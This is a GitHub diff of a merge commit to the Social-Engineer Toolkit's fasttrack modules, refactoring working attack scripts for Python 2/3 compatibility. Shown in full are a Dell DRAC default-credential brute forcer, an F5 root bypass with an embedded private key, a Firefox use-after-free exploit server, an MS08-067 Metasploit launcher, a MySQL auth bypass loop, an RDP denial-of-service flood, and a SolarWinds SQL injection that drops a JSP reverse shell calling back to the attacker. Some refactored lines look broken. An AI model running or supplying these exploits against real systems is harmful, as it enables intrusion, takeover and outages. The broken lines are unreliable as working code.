Mirrors/social-engineer-toolkit
2
0
Fork 0
mirror of https://github.com/trustedsec/social-engineer-toolkit synced 2025-04-04 14:56:08 +00:00
Code Issues Projects Releases Packages Wiki Activity

Merge pull request #258 from Cabalist/master

Browse source 
Code Review
This commit is contained in:
trustedsec 2016-07-30 14:14:42 -04:00 committed by GitHub
commit 133a6f7bfa
16 changed files with 851 additions and 1089 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

1
src/fasttrack/__init__.py
View file

@ -0,0 +1 @@
# coding=utf-8

55
src/fasttrack/autopwn.py
View file

@ -1,30 +1,38 @@
#!/usr/bin/env python
# coding=utf-8
#
#
# Metasploit Autopwn functionality
#
#
from src.core import setcore
import os
import pexpect
import src.core.setcore as core
# Py2/3 compatibility
# Python3 renamed raw_input to input
try:
input = raw_input
except NameError:
pass
# this will load the database
def prep(database, ranges):
print("\n")
setcore.PrintStatus(
"Prepping the answer file based on what was specified.")
core.print_status("Prepping the answer file based on what was specified.")
# prep the file to be written
filewrite = open("src/program_junk/autopwn.answer", "w")
setcore.PrintStatus("Using the " + database + "sql driver for autopwn")
filewrite.write("db_driver " + database + "\r\n")
setcore.PrintStatus("Autopwn will attack the following systems: " + ranges)
filewrite.write("db_nmap " + ranges + "\r\n")
filewrite.write("db_autopwn -p -t -e -r\r\n")
filewrite.write("jobs -K\r\n")
filewrite.write("sessions -l\r\n")
filewrite.close()
setcore.PrintStatus(
"Answer file has been created and prepped for delivery into Metasploit.\n")
with open("src/program_junk/autopwn.answer", "w") as filewrite:
core.print_status("Using the {0} sql driver for autopwn".format(database))
filewrite.write("db_driver {0}\r\n".format(database))
core.print_status("Autopwn will attack the following systems: {0}".format(ranges))
filewrite.write("db_nmap {0}\r\n".format(ranges))
filewrite.write("db_autopwn -p -t -e -r\r\n")
filewrite.write("jobs -K\r\n")
filewrite.write("sessions -l\r\n")
core.print_status("Answer file has been created and prepped for delivery into Metasploit.\n")
def launch():
@ -33,30 +41,27 @@ def launch():
if path variables aren't set for msfconsole this will break, even if its specified in set_config """
# launch the attack
setcore.PrintStatus(
"Launching Metasploit and attacking the systems specified. This may take a moment..")
core.print_status("Launching Metasploit and attacking the systems specified. This may take a moment..")
# try/catch block
try:
child = pexpect.spawn(
"%msfconsole -r %s/autopwn.answer\r\n\r\n" % (meta_path, setdir))
child = pexpect.spawn("{0} -r {1}\r\n\r\n".format(os.path.join(core.meta_path, 'msfconsole'),
os.path.join(core.setdir, "autopwn.answer")))
child.interact()
# handle exceptions and log them
except Exception as error:
setcore.log(error)
core.log(error)
def do_autopwn():
print('Doing do_autopwn')
# pull the metasploit database
database = setcore.meta_database()
range = input(setcore.setprompt(
["19", "20"], "Enter the IP ranges to attack (nmap syntax only)"))
database = core.meta_database()
ip_range = input(core.setprompt(["19", "20"], "Enter the IP ranges to attack (nmap syntax only)"))
# prep the answer file
prep(database, range)
confirm_attack = input(setcore.setprompt(
["19", "20"], "You are about to attack systems are you sure [y/n]"))
prep(database, ip_range)
confirm_attack = input(core.setprompt(["19", "20"], "You are about to attack systems are you sure [y/n]"))
# if we are sure, then lets do it
if confirm_attack == "yes" or confirm_attack == "y":

223
src/fasttrack/delldrac.py
View file

@ -1,4 +1,5 @@
#!/usr/bin/env python
# coding=utf-8
###########################################
#
@ -12,13 +13,25 @@
# @TrustedSec
#
##########################################
from urllib import *
import re
import threading
import sys
import time
class bcolors:
try: # Py2
from urllib import urlencode, urlopen
except ImportError: # Py3
from urllib.request import urlopen
from urllib.parse import urlencode
# Py2/3 compatibility
# Python3 renamed raw_input to input
try:
input = raw_input
except NameError:
pass
class bcolors(object):
PURPLE = '\033[95m'
CYAN = '\033[96m'
DARKCYAN = '\033[36m'
@ -58,62 +71,33 @@ class bcolors:
self.backWhite = ''
self.DARKCYAN = ''
print("\n")
print("++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++")
print("Fast-Track DellDRAC and Dell Chassis Discovery and Brute Forcer")
print("")
print("Written by Dave Kennedy @ TrustedSec")
print("https://www.trustedsec.com")
print("@TrustedSec and @HackingDave")
print("++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++")
print("")
print("This attack vector can be used to identify default installations")
print("of Dell DRAC and Chassis installations. Once found, you can use")
print("the remote administration capabilties to mount a virtual media")
print("device and use it to load for example Back|Track or password")
print("reset iso. From there, add yourself a local administrator account")
print("or dump the SAM database. This will allow you to compromise the")
print("entire infrastructure. You will need to find a DRAC instance that")
print("has an attached server and reboot it into the iso using the virtual")
print("media device.")
print("")
print("Enter the IP Address or CIDR notation below. Example: 192.168.1.1/24")
print("")
ipaddr = raw_input("Enter the IP or CIDR: ")
# try logging into DRAC, chassis is something different
def login_drac(ipaddr_single):
# default post string
url = "https://%s/Applications/dellUI/RPC/WEBSES/create.asp" % (
ipaddr_single)
url = "https://{0}/Applications/dellUI/RPC/WEBSES/create.asp".format(ipaddr_single)
# post parameters
opts = {
"WEBVAR_PASSWORD": "calvin",
"WEBVAR_USERNAME": "root",
"WEBVAR_ISCMCLOGIN": 0
}
opts = {"WEBVAR_PASSWORD": "calvin",
"WEBVAR_USERNAME": "root",
"WEBVAR_ISCMCLOGIN": 0}
# URL encode it
data = urlencode(opts)
# our headers to pass (taken from raw post)
headers = {
# "Host": "10.245.196.52",
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:14.0) Gecko/20100101 Firefox/14.0.1",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "en-us,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Connection": "keep-alive",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"Referer": "https://%s/Applications/dellUI/login.htm" % (ipaddr_single),
"Content-Length": 63,
"Cookie": "test=1; SessionLang=EN",
"Pragma": "no-cache",
"Cache-Control": "no-cache"
}
headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:14.0) Gecko/20100101 Firefox/14.0.1",
# "Host": "10.245.196.52",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "en-us,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Connection": "keep-alive",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"Referer": "https://{0}/Applications/dellUI/login.htm".format(ipaddr_single),
"Content-Length": 63,
"Cookie": "test=1; SessionLang=EN",
"Pragma": "no-cache",
"Cache-Control": "no-cache"}
# request the page
#req = urlopen(url, data, headers)
try:
# capture the response
response = urlopen(url, data, headers, timeout=2)
@ -124,50 +108,49 @@ def login_drac(ipaddr_single):
# Failure_No_Free_Slot means there are no sessions available need to
# log someone off
if "Failure_No_Free_Slot" in data:
print((bcolors.YELLOW + "[!]" + bcolors.ENDC +
" There are to many people logged but un: root and pw: calvin are legit on IP: " % (ipaddr_single)))
print(("{0}[!]{1} There are to many people logged but un: root and pw: calvin are legit on IP: {2}".format(bcolors.YELLOW,
bcolors.ENDC,
ipaddr_single)))
global global_check1
global_check1 = 1
# if we are presented with a username back, we are golden
if "'USERNAME' : 'root'" in data:
print((bcolors.GREEN + "[*]" + bcolors.ENDC +
" Dell DRAC compromised! username: root and password: calvin for IP address: " + ipaddr_single))
print("{0}[*]{1} Dell DRAC compromised! username: root and password: calvin for IP address: {2}".format(bcolors.GREEN,
bcolors.ENDC,
ipaddr_single))
global global_check2
global_check2 = 1
# handle failed attempts and move on
except:
pass
# these are for the centralized dell chassis
def login_chassis(ipaddr_single):
# our post URL
url = "https://%s/cgi-bin/webcgi/login" % (ipaddr_single)
url = "https://{0}/cgi-bin/webcgi/login".format(ipaddr_single)
# our post parameters
opts = {
"WEBSERVER_timeout": "1800",
"user": "root",
"password": "calvin",
"WEBSERVER_timeout_select": "1800"
}
opts = {"WEBSERVER_timeout": "1800",
"user": "root",
"password": "calvin",
"WEBSERVER_timeout_select": "1800"}
# url encode
data = urlencode(opts)
# headers (taken from raw POST)
headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:14.0) Gecko/20100101 Firefox/14.0.1",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "en-us,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Connection": "keep-alive",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"Referer": "https://%s/cgi-bin/webcgi/login" % (ipaddr_single),
"Content-Length": 78
}
headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:14.0) Gecko/20100101 Firefox/14.0.1",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "en-us,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Connection": "keep-alive",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"Referer": "https://{0}/cgi-bin/webcgi/login".format(ipaddr_single),
"Content-Length": 78}
# request the page
#req = Request(url, data, headers)
# req = Request(url, data, headers)
try:
# capture the response
response = urlopen(url, data, headers, timeout=2)
@ -177,15 +160,17 @@ def login_chassis(ipaddr_single):
pass # login failed
# to many people logged in at a given time
if 'Connection refused, maximum sessions already in use.' in data:
print((bcolors.YELLOW + "[!]" + bcolors.ENDC +
" There are to many people logged but un: root and pw: calvin are legit on IP: " + (ipaddr_single)))
print(("{0}[!]{1} There are to many people logged but un: root and pw: calvin are legit on IP: {2}".format(bcolors.YELLOW,
bcolors.ENDC,
ipaddr_single)))
global global_check3
global_check3 = 1
# successful guess of passwords
if "/cgi-bin/webcgi/index" in data:
print((bcolors.GREEN + "[*]" + bcolors.ENDC +
" Dell Chassis Compromised! username: root password: calvin for IP address: " + ipaddr_single))
print("{0}[*]{1} Dell Chassis Compromised! username: root password: calvin for IP address: {2}".format(bcolors.GREEN,
bcolors.ENDC,
ipaddr_single))
global global_check4
global_check4 = 1
@ -193,6 +178,7 @@ def login_chassis(ipaddr_single):
except:
pass
# this will check to see if we are using
# a valid IP address for scanning
@ -234,25 +220,24 @@ def is_valid_ip(ip):
""", re.VERBOSE | re.IGNORECASE)
return pattern.match(ip) is not None
# convert to 32 bit binary from standard format
# convert to 32 bit binary from standard format
def ip2bin(ip):
b = ""
inQuads = ip.split(".")
outQuads = 4
for q in inQuads:
in_quads = ip.split(".")
out_quads = 4
for q in in_quads:
if q != "":
b += dec2bin(int(q), 8)
outQuads -= 1
while outQuads > 0:
out_quads -= 1
while out_quads > 0:
b += "00000000"
outQuads -= 1
out_quads -= 1
return b
# decimal to binary conversion
def dec2bin(n, d=None):
s = ""
while n > 0:
@ -268,53 +253,49 @@ def dec2bin(n, d=None):
s = "0"
return s
# convert a binary string into an IP address
def bin2ip(b):
ip = ""
for i in range(0, len(b), 8):
ip += str(int(b[i:i + 8], 2)) + "."
return ip[:-1]
# print a list of IP addresses based on the CIDR block specified
def scan(ipaddr):
if "/" in ipaddr:
parts = ipaddr.split("/")
baseIP = ip2bin(parts[0])
base_ip = ip2bin(parts[0])
subnet = int(parts[1])
if subnet == 32:
ipaddr = bin2ip(baseIP)
ipaddr = bin2ip(base_ip)
else:
# our base ip addresses for how many we are going to be scanning
counter = 0
# capture the threads
threads = []
ipPrefix = baseIP[:-(32 - subnet)]
for i in range(2**(32 - subnet)):
ipaddr_single = bin2ip(ipPrefix + dec2bin(i, (32 - subnet)))
ip_prefix = base_ip[:-(32 - subnet)]
for i in range(2 ** (32 - subnet)):
ipaddr_single = bin2ip(ip_prefix + dec2bin(i, (32 - subnet)))
# if we are valid proceed
ip_check = is_valid_ip(ipaddr_single)
if ip_check != False:
if ip_check:
# do this to limit how fast it can scan, anything more
# causes CPU to hose
if counter > 255:
# put a small delay in place
time.sleep(0.1)
# increase counter until 255 then delay 0.1
counter = counter + 1
counter += 1
# start our drac BF
thread = threading.Thread(
target=login_drac, args=(ipaddr_single,))
thread = threading.Thread(target=login_drac, args=(ipaddr_single,))
# create a list of our threads in a dictionary
threads.append(thread)
# start the thread
thread.start()
# same as above just on the chassis
thread = threading.Thread(
target=login_chassis, args=(ipaddr_single,))
thread = threading.Thread(target=login_chassis, args=(ipaddr_single,))
# append the thread
threads.append(thread)
# start the thread
@ -325,15 +306,38 @@ def scan(ipaddr):
thread.join()
# if we are using a single IP address then just do this
if not "/" in ipaddr:
if "/" not in ipaddr:
login_drac(ipaddr)
login_chassis(ipaddr)
print((bcolors.GREEN + "[*]" + bcolors.ENDC +
" Scanning IP addresses, this could take a few minutes depending on how large the subnet range..."))
print((bcolors.GREEN + "[*]" + bcolors.ENDC +
" As an example, a /16 can take an hour or two.. A slash 24 is only a couple seconds. Be patient."))
print("\n")
print("++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++")
print("Fast-Track DellDRAC and Dell Chassis Discovery and Brute Forcer")
print("")
print("Written by Dave Kennedy @ TrustedSec")
print("https://www.trustedsec.com")
print("@TrustedSec and @HackingDave")
print("++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++")
print("")
print("This attack vector can be used to identify default installations")
print("of Dell DRAC and Chassis installations. Once found, you can use")
print("the remote administration capabilties to mount a virtual media")
print("device and use it to load for example Back|Track or password")
print("reset iso. From there, add yourself a local administrator account")
print("or dump the SAM database. This will allow you to compromise the")
print("entire infrastructure. You will need to find a DRAC instance that")
print("has an attached server and reboot it into the iso using the virtual")
print("media device.")
print("")
print("Enter the IP Address or CIDR notation below. Example: 192.168.1.1/24")
print("")
ipaddr = input("Enter the IP or CIDR: ")
print("{0}[*]{1} Scanning IP addresses, this could take a few minutes depending on how large the subnet range...".format(bcolors.GREEN,
bcolors.ENDC))
print("{0}[*]{1} Asan example, a /16 can take an hour or two.. A slash 24 is only a couple seconds. Be patient.".format(bcolors.GREEN,
bcolors.ENDC))
# set global variables to see if we were successful
global_check1 = 0
@ -343,12 +347,11 @@ global_check4 = 0
# kick off the scan
scan(ipaddr)
if global_check1 or global_check2 or global_check3 or global_check4 == 1:
print((bcolors.GREEN + "[*]" + bcolors.ENDC +
" DellDrac / Chassis Brute Forcer has finished scanning. Happy Hunting =)"))
if any([global_check1, global_check2, global_check3, global_check4]):
print(("{0}[*]{1} DellDrac / Chassis Brute Forcer has finished scanning. Happy Hunting =)".format(bcolors.GREEN,
bcolors.ENDC)))
else:
print((bcolors.RED + "[!]" + bcolors.ENDC +
" Sorry, unable to find any of the Dell servers with default creds..Good luck :("))
print(("{0}[!]{1} Sorry, unable to find any of the Dell servers with default creds..Good luck :(".format(bcolors.RED,
bcolors.ENDC)))
raw_input("Press {return} to exit.")
input("Press {return} to exit.")

1
src/fasttrack/exploits/__init__.py
View file

@ -0,0 +1 @@
# coding=utf-8

59
src/fasttrack/exploits/f5.py
View file

@ -1,4 +1,5 @@
#!/usr/bin/python
# coding=utf-8
#
# Title: F5 BIG-IP Remote Root Authentication Bypass Vulnerability (py)
#
@ -6,35 +7,35 @@
# http://www.trustedsec.com
#
#
import subprocess
import os
import subprocess
filewrite = open("priv.key", "w")
filewrite.write("""-----BEGIN RSA PRIVATE KEY-----
MIICWgIBAAKBgQC8iELmyRPPHIeJ//uLLfKHG4rr84HXeGM+quySiCRgWtxbw4rh
UlP7n4XHvB3ixAKdWfys2pqHD/Hqx9w4wMj9e+fjIpTi3xOdh/YylRWvid3Pf0vk
OzWftKLWbay5Q3FZsq/nwjz40yGW3YhOtpK5NTQ0bKZY5zz4s2L4wdd0uQIBIwKB
gBWL6mOEsc6G6uszMrDSDRbBUbSQ26OYuuKXMPrNuwOynNdJjDcCGDoDmkK2adDF
8auVQXLXJ5poOOeh0AZ8br2vnk3hZd9mnF+uyDB3PO/tqpXOrpzSyuITy5LJZBBv
7r7kqhyBs0vuSdL/D+i1DHYf0nv2Ps4aspoBVumuQid7AkEA+tD3RDashPmoQJvM
2oWS7PO6ljUVXszuhHdUOaFtx60ZOg0OVwnh+NBbbszGpsOwwEE+OqrKMTZjYg3s
37+x/wJBAMBtwmoi05hBsA4Cvac66T1Vdhie8qf5dwL2PdHfu6hbOifSX/xSPnVL
RTbwU9+h/t6BOYdWA0xr0cWcjy1U6UcCQQDBfKF9w8bqPO+CTE2SoY6ZiNHEVNX4
rLf/ycShfIfjLcMA5YAXQiNZisow5xznC/1hHGM0kmF2a8kCf8VcJio5AkBi9p5/
uiOtY5xe+hhkofRLbce05AfEGeVvPM9V/gi8+7eCMa209xjOm70yMnRHIBys8gBU
Ot0f/O+KM0JR0+WvAkAskPvTXevY5wkp5mYXMBlUqEd7R3vGBV/qp4BldW5l0N4G
LesWvIh6+moTbFuPRoQnGO2P6D7Q5sPPqgqyefZS
-----END RSA PRIVATE KEY-----""")
filewrite.close()
subprocess.Popen("chmod 700 priv.key", shell=True).wait()
print("""
Title: F5 BIG-IP Remote Root Authentication Bypass Vulnerability (py)
try:
with open("priv.key", 'w') as filewrite:
filewrite.write("""-----BEGIN RSA PRIVATE KEY-----
MIICWgIBAAKBgQC8iELmyRPPHIeJ//uLLfKHG4rr84HXeGM+quySiCRgWtxbw4rh
UlP7n4XHvB3ixAKdWfys2pqHD/Hqx9w4wMj9e+fjIpTi3xOdh/YylRWvid3Pf0vk
OzWftKLWbay5Q3FZsq/nwjz40yGW3YhOtpK5NTQ0bKZY5zz4s2L4wdd0uQIBIwKB
gBWL6mOEsc6G6uszMrDSDRbBUbSQ26OYuuKXMPrNuwOynNdJjDcCGDoDmkK2adDF
8auVQXLXJ5poOOeh0AZ8br2vnk3hZd9mnF+uyDB3PO/tqpXOrpzSyuITy5LJZBBv
7r7kqhyBs0vuSdL/D+i1DHYf0nv2Ps4aspoBVumuQid7AkEA+tD3RDashPmoQJvM
2oWS7PO6ljUVXszuhHdUOaFtx60ZOg0OVwnh+NBbbszGpsOwwEE+OqrKMTZjYg3s
37+x/wJBAMBtwmoi05hBsA4Cvac66T1Vdhie8qf5dwL2PdHfu6hbOifSX/xSPnVL
RTbwU9+h/t6BOYdWA0xr0cWcjy1U6UcCQQDBfKF9w8bqPO+CTE2SoY6ZiNHEVNX4
rLf/ycShfIfjLcMA5YAXQiNZisow5xznC/1hHGM0kmF2a8kCf8VcJio5AkBi9p5/
uiOtY5xe+hhkofRLbce05AfEGeVvPM9V/gi8+7eCMa209xjOm70yMnRHIBys8gBU
Ot0f/O+KM0JR0+WvAkAskPvTXevY5wkp5mYXMBlUqEd7R3vGBV/qp4BldW5l0N4G
LesWvIh6+moTbFuPRoQnGO2P6D7Q5sPPqgqyefZS
-----END RSA PRIVATE KEY-----""")
subprocess.Popen("chmod 700 priv.key", shell=True).wait()
print("""
Title: F5 BIG-IP Remote Root Authentication Bypass Vulnerability (py)
Quick script written by Dave Kennedy (ReL1K) for F5 authentication root bypass
http://www.trustedsec.com
""")
ipaddr = input("Enter the IP address of the F5: ")
subprocess.Popen("ssh -i priv.key root@%s" % (ipaddr), shell=True).wait()
if os.path.isfile("priv.key"):
os.remove("priv.key")
Quick script written by Dave Kennedy (ReL1K) for F5 authentication root bypass
http://www.trustedsec.com
""")
ipaddr = input("Enter the IP address of the F5: ")
subprocess.Popen("ssh -i priv.key root@{0}".format(ipaddr), shell=True).wait()
finally:
if os.path.isfile("priv.key"):
os.remove("priv.key")

35
src/fasttrack/exploits/firefox_3_6_16.py
View file

@ -1,14 +1,10 @@
#!/usr/bin/env python
# coding=utf-8
# Mozilla Firefox 3.6.16 mChannel Object Use After Free Exploit (Win7) by Mr_Me
from http.server import HTTPServer
from http.server import BaseHTTPRequestHandler
import sys
try:
import psyco
psyco.full()
except ImportError:
pass
try: # Py2
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
except ImportError: # Py3
from http.server import BaseHTTPRequestHandler, HTTPServer
class myRequestHandler(BaseHTTPRequestHandler):
@ -143,13 +139,13 @@ trigger();
</html>
""")
self.wfile.write(
"""<title>Please wait...</title></head><body>""")
self.wfile.write("""<title>Please wait...</title></head><body>""")
self.wfile.write("""<left><body bgcolor="Black"><font color="White">
Please wait<br>""")
print((
"\n\n[-] Exploit sent... [-]\n[-] Wait about 30 seconds and attempt to connect.[-]\n[-] Connect to IP Address: %s and port 4444 [-]" % (target)))
print(("\n\n[-] Exploit sent... [-]\n"
"[-] Wait about 30 seconds and attempt to connect.[-]\n"
"[-] Connect to IP Address: {0} and port 4444 [-]".format(target)))
# Print custom HTTP Response
def printCustomHTTPResponse(self, respcode):
@ -159,20 +155,21 @@ trigger();
self.end_headers()
# In case of exceptions, pass them
except Exception:
except:
pass
httpd = HTTPServer(('', 80), myRequestHandler)
print ("""
print("""
#####################################################################################
# Mozilla Firefox 3.6.16 mChannel Object Use After Free Exploit (Win7) by Mr. Me. #
#####################################################################################
""")
print (" [-] Starting Mozilla Firefox 3.6.16 mChannel Object Use After Free Exploit (Win7) [-]")
print (" [-] Have someone connect to you on port 80 [-]")
print ("\n\n <ctrl>-c to Cancel")
print(" [-] Starting Mozilla Firefox 3.6.16 mChannel Object Use After Free Exploit (Win7) [-]")
print(" [-] Have someone connect to you on port 80 [-]")
print("\n\n <ctrl>-c to Cancel")
try:
# handle the connections
@ -181,4 +178,4 @@ try:
httpd.serve_forever()
# Except Keyboard Interrupts and throw custom message
except KeyboardInterrupt:
print ("\n\n Exiting exploit...\n\n")
print("\n\n Exiting exploit...\n\n")

35
src/fasttrack/exploits/ms08067.py
View file

@ -1,4 +1,5 @@
#!/usr/bin/env python
# coding=utf-8
#
#
# This has been redesigned to use the MS08-067 in Metasploit which is much more reliable.
@ -6,19 +7,35 @@
#
#
import subprocess
# Py2/3 compatibility
# Python3 renamed raw_input to input
try:
input = raw_input
except NameError:
pass
def create_rc(revhost, victim, payload, port):
filewrite = file("/root/.set/ms08-067.rc", "w")
filewrite.write("use exploit/windows/smb/ms08_067_netapi\nset payload %s\nset RHOST %s\nset LPORT %s\nset LHOST %s\nexploit\n\n" % (payload, victim, port, revhost))
filewrite.close()
with open("/root/.set/ms08-067.rc", "w") as filewrite:
filewrite.write("use exploit/windows/smb/ms08_067_netapi\n"
"set payload {0}\n"
"set RHOST {1}\n"
"set LPORT {2}\n"
"set LHOST {3}\n"
"exploit\n\n".format(payload, victim, port, revhost))
def launch_msf():
subprocess.Popen("msfconsole -r /root/.set/ms08-067.rc", shell=True).wait()
subprocess.Popen("msfconsole -r /root/.set/ms08-067.rc", shell=True).wait()
revhost = raw_input("Enter your LHOST (attacker IP address) for the reverse listener: ")
revport = raw_input("Enter your LPORT (attacker port) for the reverse listener: ")
victim = raw_input("Enter the RHOST (victim IP) for MS08-067: ")
payload = raw_input("Enter your payload (example: windows/meterpreter/reverse_https) - just hit enter for reverse_https: ")
if payload == (""): payload = ("windows/meterpreter/reverse_https")
revhost = input("Enter your LHOST (attacker IP address) for the reverse listener: ")
revport = input("Enter your LPORT (attacker port) for the reverse listener: ")
victim = input("Enter the RHOST (victim IP) for MS08-067: ")
payload = input("Enter your payload (example: windows/meterpreter/reverse_https) - just hit enter for reverse_https: ")
if not payload:
payload = "windows/meterpreter/reverse_https"
# create the rc file
create_rc(revhost, victim, payload, revport)

13
src/fasttrack/exploits/mysql_bypass.py
View file

@ -1,4 +1,5 @@
#!/usr/bin/python
# coding=utf-8
#
#
# This has to be the easiest "exploit" ever. Seriously. Embarassed to submit this a little.
@ -11,6 +12,13 @@
#
import subprocess
# Py2/3 compatibility
# Python3 renamed raw_input to input
try:
input = raw_input
except NameError:
pass
print("""
This has to be the easiest "exploit" ever. Seriously. Embarassed to submit this a little.
@ -25,6 +33,5 @@ work, then its not vulnerable.
""")
ipaddr = input("Enter the IP address of the mysql server: ")
while 1:
subprocess.Popen("mysql --host=%s -u root mysql --password=blah" %
(ipaddr), shell=True).wait()
while True:
subprocess.Popen("mysql --host={0} -u root mysql --password=blah".format(ipaddr), shell=True).wait()

44
src/fasttrack/exploits/rdpdos.py
View file

@ -1,3 +1,4 @@
# coding=utf-8
# Exploit Title: Pakyu Cenloder
# Date: March 16 2012
# Author: BMario
@ -12,19 +13,50 @@
# CVE : MS12-020
import socket
import sys
import binascii
# Py2/3 compatibility
# Python3 renamed raw_input to input
try:
input = raw_input
except NameError:
pass
print("Microsoft Terminal Services / Remote Desktop Services - Denial of Service")
headpack = "030000130ee000000000000100080000000000".decode('hex')
dafuq = "030001d602f0807f658201940401010401010101ff30190204000000000204000000020204000000000204000000010204000000000204000000010202ffff020400000002301902040000000102040000000102040000000102040000000102040000000002040000000102020420020400000002301c0202ffff0202fc170202ffff0204000000010204000000000204000000010202ffff02040000000204820133000500147c0001812a000800100001c00044756361811c01c0d800040008008002e00101ca03aa09040000ce0e000048004f005300540000000000000000000000000000000000000000000000000004000000000000000c0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001ca010000000000100007000100300030003000300030002d003000300030002d0030003000300030003000300030002d003000300030003000300000000000000000000000000000000000000000000000000004c00c000d0000000000000002c00c001b0000000000000003c02c0003000000726470647200000000008080636c6970726472000000a0c0726470736e640000000000c0".decode(
'hex')
dafree = "0300000802f08028".decode('hex')
headpack = binascii.hexlify(b"030000130ee000000000000100080000000000")
dafuq = b"030001d602f0807f658201940401010401010101f" \
b"f3019020400000000020400000002020400000000" \
b"0204000000010204000000000204000000010202f" \
b"fff02040000000230190204000000010204000000" \
b"01020400000001020400000001020400000000020" \
b"40000000102020420020400000002301c0202ffff" \
b"0202fc170202ffff0204000000010204000000000" \
b"204000000010202ffff0204000000020482013300" \
b"0500147c0001812a000800100001c000447563618" \
b"11c01c0d800040008008002e00101ca03aa090400" \
b"00ce0e000048004f0053005400000000000000000" \
b"00000000000000000000000000000000004000000" \
b"000000000c0000000000000000000000000000000" \
b"00000000000000000000000000000000000000000" \
b"00000000000000000000000000000000000000000" \
b"00000000000000000000001ca0100000000001000" \
b"07000100300030003000300030002d00300030003" \
b"0002d0030003000300030003000300030002d0030" \
b"00300030003000300000000000000000000000000" \
b"000000000000000000000000004c00c000d000000" \
b"0000000002c00c001b0000000000000003c02c000" \
b"3000000726470647200000000008080636c697072" \
b"6472000000a0c0726470736e640000000000c0"
dafuq = binascii.hexlify(dafuq)
dafree = binascii.hexlify(b"0300000802f08028")
trololo = headpack + dafuq + dafree
#HOSTNYO = sys.argv[1]
HOSTNYO = raw_input("Enter the IP address to crash (remote desktop): ")
HOSTNYO = input("Enter the IP address to crash (remote desktop): ")
PORTNYO = 3389
for i in range(10240):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

84
src/fasttrack/exploits/solarwinds.py
View file

@ -1,4 +1,5 @@
#!/usr/bin/python
# coding=utf-8
##########################################################################
# Exploit Title: Solarwinds Storage Manager 5.1.0 Remote SYSTEM SQL Injection Exploit
# Date: May 2nd 2012
@ -11,10 +12,25 @@
##########################################################################
import urllib
import http.cookiejar
import sys
import ntpath
import random
import binascii
try: # Py2
from cookielib import CookieJar
from urllib2 import build_opener, HTTPCookieProcessor
from urllib import urlencode
except ImportError: # Py3
from http.cookiejar import CookieJar
from urllib.request import build_opener, HTTPCookieProcessor
from urllib.parse import urlencode
# Py2/3 compatibility
# Python3 renamed raw_input to input
try:
input = raw_input
except NameError:
pass
print("\n[*] Solarwinds Storage Manager 5.1.0 Remote SYSTEM SQL Injection Exploit")
print("[*] Vulnerability discovered by Digital Defence - DDIVRT-2011-39")
@ -25,9 +41,9 @@ print("[*] Offensive Security - http://www.offensive-security.com\n")
# print "[*] Usage: solarshell.py <RHOST> <LHOST> <LPORT>"
# exit(0)
#rhost = sys.argv[1]
#lhost = sys.argv[2]
#lport = sys.argv[3]
# rhost = sys.argv[1]
# lhost = sys.argv[2]
# lport = sys.argv[3]
rhost = input("Enter the remote host IP address: ")
lhost = input("Enter the attacker IP address: ")
@ -38,7 +54,7 @@ for i in random.sample('abcdefghijklmnopqrstuvwxyz1234567890', 6):
filename += i
filename += ".jsp"
output_path = "c:/Program Files/SolarWinds/Storage Manager Server/webapps/ROOT/%s" % filename
output_path = ntpath.join("c:/Program Files/SolarWinds/Storage Manager Server/webapps/ROOT/", filename)
jsp = '''<%@page import="java.lang.*"%>
<%@page import="java.util.*"%>
@ -47,74 +63,72 @@ jsp = '''<%@page import="java.lang.*"%>
<%
class StreamConnector extends Thread
{
{{
InputStream is;
OutputStream os;
StreamConnector( InputStream is, OutputStream os )
{
{{
this.is = is;
this.os = os;
}
}}
public void run()
{
{{
BufferedReader in = null;
BufferedWriter out = null;
try
{
{{
in = new BufferedReader( new InputStreamReader( this.is ) );
out = new BufferedWriter( new OutputStreamWriter( this.os ) );
char buffer[] = new char[8192];
int length;
while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 )
{
{{
out.write( buffer, 0, length );
out.flush();
}
} catch( Exception e ){}
}}
}} catch( Exception e ){{}}
try
{
{{
if( in != null )
in.close();
if( out != null )
out.close();
} catch( Exception e ){}
}
}
}} catch( Exception e ){{}}
}}
}}
try
{
Socket socket = new Socket( "''' + lhost + '''", ''' + lport + ''');
{{
Socket socket = new Socket( "''{lhost}''", ''{lport}'');
Process process = Runtime.getRuntime().exec( "cmd.exe" );
( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
} catch( Exception e ) {}
%>'''
}} catch( Exception e ) {{}}
%>'''.format(lhost=lhost, lport=lport)
jsp = jsp.replace("\n", "")
jsp = jsp.replace("\t", "")
prepayload = "AAA' "
prepayload += 'union select 0x%s,2,3,4,5,6,7,8,9,10,11,12,13,14 into outfile "%s"' % (
jsp.encode('hex'), output_path)
prepayload += 'union select 0x{0},2,3,4,5,6,7,8,9,10,11,12,13,14 into outfile "{1}"'.format(binascii.hexlify(jsp.encode('ascii')), output_path)
prepayload += "#"
